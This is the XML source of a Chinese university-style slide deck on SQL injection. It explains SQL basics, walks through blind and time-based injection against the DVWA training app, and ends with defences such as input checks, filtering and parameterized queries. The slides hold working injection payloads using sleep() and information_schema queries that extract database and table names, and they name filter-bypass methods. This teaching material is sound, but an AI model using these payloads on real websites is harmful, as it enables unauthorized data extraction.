            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>猜解密码长度（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>长度固定） </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>猜解密码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0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4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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(Database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DB)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指的是以一定方式储存在一起、能为多个用户共享、具有尽可能小的冗余度、与应用程序彼此独立的数据集合。简单来说可视为电子化的文件柜</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存储电子文件的处所，用户可以对文件中的数据运行新增、截取、更新、删除等操作。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>日常生活有关：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>身份证信息放在公安部的系统</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>银行卡的余额和交易记录、转帐信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在酒店的入住信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>打游戏的装备、等级、魔力、力量、攻击能力等信息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9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基于时间的盲注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 and sleep(5) #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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立即跳出，说明错误，不是数字型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sleep(5) #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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等待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秒，说明正确，为字符型</a:t>
            </a:r>
          </a:p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无论下面结果跳对跳错，只要等待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秒后有反应就说明是正确的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7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猜解数据库的长度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感受时间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0"/>
              <a:t>1’and if(length(database())=1,sleep(5),1)#</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>失败</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0"/>
              <a:t>1’and if(length(database())=4,sleep(5),1)#</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>加载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>秒，成功</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>长度为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0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6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猜解数据库的名称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1’ and if(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(database(),1,1))&gt;97,sleep(5),1)#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成功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1’ and if(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(database(),1,1))&lt;112,sleep(5),1)#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成功，全为小写字母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和布尔值一样的方法试出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1’ and if(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(database(),1,1))=100,sleep(5),1)#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第一位为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1’ and if(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(database(),2,1))=118,sleep(5),1)#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第二位为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最后以此类推为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7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猜解数据库有几个表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1’and if((select count(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)from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=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’)=1,sleep(5),1)#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>失败</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1’and if((select count(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)from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=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’)=2,sleep(5),1)#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>成功，有两个表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5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猜解表的长度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1’ and if(length(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’ limit 0,1),1))=1,sleep(5),1)#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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失败</a:t>
            </a:r>
          </a:p>
          <a:p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1’ and if(length(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’ limit 0,1),1))=9,sleep(5),1)#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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成功，说明第一个表为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位</a:t>
            </a:r>
          </a:p>
          <a:p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1’ and if(length(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’ limit 1,1),1))=5,sleep(5),1) #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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成功，说明是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继续猜测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猜解表的名称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if(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((select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information_schema.tables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table_schema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dvwa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’ limit 0,1),1))&gt;97,sleep(5),1)#</a:t>
            </a:r>
          </a:p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猜解表中有几个字段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1’ and if((select count(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)from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information_schema.columns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=‘users’)=8,sleep(5),1) #</a:t>
            </a:r>
          </a:p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猜解字段的长度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猜解字段的名称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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>工具使用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http://sqlmap.org/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3074" name="Picture 2" descr="http://sqlmap.org/images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7486650" cy="37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注入攻击的原理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注入攻击的分类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回显注入攻击的流程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盲注攻击的流程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常见防护手段</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32953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参数类型检测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限制用户输入数字型参数，如查询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号、学号、电话号码等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intval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is_numeric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ctype_digit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函数进行数字型参数过滤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intval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通过使用指定的进制转换（默认是十进制），返回变量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数值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is_number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检测变量是否为数字或数字字符串，但此函数允许输入为负数和小数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Ctype_digit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检测字符串中字符是否都是数字，负数和小数无法通过检测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4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参数长度检测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当攻击者构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入攻击时，语句都会比较长</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符量通常非常多，远大于正常业务</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数检查输入长度</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这里是指后台检查长度，和网页元素长度不一样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6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数据库基本单位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287000" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据库服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用来运行数据库服务的一台电脑</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p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一个数据库服务器里面有可以有多个数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例如：用户数据（用户、密码）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据字段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>就是我们日常所见表格里面的列</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>真正的数据存在每一个表的行里面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危险参数过滤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有的时候因为业务需求，无法直接控制字符和长度</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>危险参数过滤包括：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内置函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>敏感字符的过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>: union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>exec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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>黑名单过滤：例如过滤敏感词</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>白名单过滤：例如设置白名单为用户名，先进行用户名对比</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参数转义：针对单引号、双引号、反斜杠等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8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绕过方法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过滤各类关键词不够全面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>尖括号过滤绕过</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>逗号过滤绕过</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>空格过滤绕过</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>危险字符拆分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即使可以绕过，也极大提高了攻击成本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注入安全防护流程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08170"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="914400" y="1219200"/>
          <a:ext cx="10287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09800" y="4343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发送请求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8404" y="4343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请求参数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81906" y="4343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896" y="4331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4038600" y="1897882"/>
            <a:ext cx="1524000" cy="6096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过滤或转义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6477000" y="1897882"/>
            <a:ext cx="1524000" cy="6096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参数化查询</a:t>
            </a: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4696599" y="2667000"/>
            <a:ext cx="436602" cy="3810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5400000">
            <a:off x="7017603" y="2668005"/>
            <a:ext cx="436602" cy="3810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2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先完成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指令的编译，才套用参数运行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就算参数里面包含有害的指令，也只是一个参数，不会影响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语句的结构，不会被执行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中有三种常见的框架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访问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数据库的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mysqli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包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PEAR::MDB2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Object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大部分数据库都支持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Oracle,SQL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Server,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Access…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9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DVWA SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>impossible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3" y="1676400"/>
            <a:ext cx="983724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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是结构化查询语言（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），一种用于存储、操作或者检索存储在关系型数据库中数据的计算机语言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是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ANSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>American National Standard Institute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，美国国家标准协会）标准</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关系型数据库系统（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Relation Database System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）的标准语言</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>但也存在多个版本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2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查询：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT field FROM table WHERE condition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>删除：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DELETE FROM table WHERE condition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>更新：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UPDATE table SET field=value WHERE condition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>添加：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>INSERT INTO table values(values)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429000"/>
            <a:ext cx="4648200" cy="25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SQL命令主要分为三类：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据操作语言 (DML)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据定义语言 (DDL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据控制语言 (DCL)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者可以使用这些命令类型中的每一种来破坏系统的机密性、完整性和/或可用性。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数据操作语言 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(DML)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1800" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>顾名思义，数据操作语言处理数据的操作。DML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>命令用于存储、检索、修改和删除数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>从数据库中检索数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>INSERT - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>将数据插入数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UPDATE - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>更新数据库中的现有数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DELETE - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>从数据库中删除记录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>如果攻击者成功将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> DML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>语句“注入”到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>数据库中，他就可以破坏系统的机密性（使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>完整性（使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> UPDATE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>语句）和可用性（使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> DELETE 或 UPDATE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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3623</TotalTime>
  <Words>3797</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>523</Paragraphs>
  <Slides>54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黑体</vt:lpstr>
      <vt:lpstr>华文新魏</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>300TGp_natural_light</vt:lpstr>
      <vt:lpstr>第五讲 SQL注入</vt:lpstr>
      <vt:lpstr>课程内容</vt:lpstr>
      <vt:lpstr>SQL注入攻击简介</vt:lpstr>
      <vt:lpstr>什么是数据库</vt:lpstr>
      <vt:lpstr>数据库基本单位</vt:lpstr>
      <vt:lpstr>什么是SQL</vt:lpstr>
      <vt:lpstr>常用的SQL语句</vt:lpstr>
      <vt:lpstr>SQL命令分类</vt:lpstr>
      <vt:lpstr>数据操作语言 (DML)</vt:lpstr>
      <vt:lpstr>课堂小练习</vt:lpstr>
      <vt:lpstr>课堂小练习</vt:lpstr>
      <vt:lpstr>数据定义语言 (DDL)</vt:lpstr>
      <vt:lpstr>例子</vt:lpstr>
      <vt:lpstr>课堂小练习</vt:lpstr>
      <vt:lpstr>数据控制语言 (DCL)</vt:lpstr>
      <vt:lpstr>课堂小练习</vt:lpstr>
      <vt:lpstr>网站数据库查询过程</vt:lpstr>
      <vt:lpstr>SQL注入漏洞是怎么产生的</vt:lpstr>
      <vt:lpstr>DVWA SQL注入(Low) 页面源代码</vt:lpstr>
      <vt:lpstr>查询结果</vt:lpstr>
      <vt:lpstr>常见的注入测试</vt:lpstr>
      <vt:lpstr>SQL注入攻击的分类</vt:lpstr>
      <vt:lpstr>回显注入攻击的流程</vt:lpstr>
      <vt:lpstr>SQL手工注入的思路 - 1寻找注入点</vt:lpstr>
      <vt:lpstr>SQL手工注入的思路–2通过回显位确定字段数</vt:lpstr>
      <vt:lpstr>SQL手工注入的思路–3 注入并获取数据</vt:lpstr>
      <vt:lpstr>判断数据库类型</vt:lpstr>
      <vt:lpstr>SQL手工注入的思路–3 注入并获取数据</vt:lpstr>
      <vt:lpstr>课程内容</vt:lpstr>
      <vt:lpstr>盲注攻击的流程</vt:lpstr>
      <vt:lpstr>步骤1：</vt:lpstr>
      <vt:lpstr>步骤2</vt:lpstr>
      <vt:lpstr>步骤3</vt:lpstr>
      <vt:lpstr>步骤4</vt:lpstr>
      <vt:lpstr>不断尝试数据名称</vt:lpstr>
      <vt:lpstr>步骤5</vt:lpstr>
      <vt:lpstr>步骤6</vt:lpstr>
      <vt:lpstr>步骤7</vt:lpstr>
      <vt:lpstr>步骤8</vt:lpstr>
      <vt:lpstr>基于时间的盲注</vt:lpstr>
      <vt:lpstr>猜解数据库的长度</vt:lpstr>
      <vt:lpstr>猜解数据库的名称</vt:lpstr>
      <vt:lpstr>猜解数据库有几个表</vt:lpstr>
      <vt:lpstr>猜解表的长度</vt:lpstr>
      <vt:lpstr>继续猜测</vt:lpstr>
      <vt:lpstr>SQLMap工具使用</vt:lpstr>
      <vt:lpstr>课程内容</vt:lpstr>
      <vt:lpstr>参数类型检测</vt:lpstr>
      <vt:lpstr>参数长度检测</vt:lpstr>
      <vt:lpstr>危险参数过滤</vt:lpstr>
      <vt:lpstr>绕过方法</vt:lpstr>
      <vt:lpstr>SQL注入安全防护流程</vt:lpstr>
      <vt:lpstr>参数化查询</vt:lpstr>
      <vt:lpstr>DVWA SQL注入 impossible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278</cp:revision>
  <cp:lastPrinted>1601-01-01T00:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1601-01-01T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-11T06:48:06Z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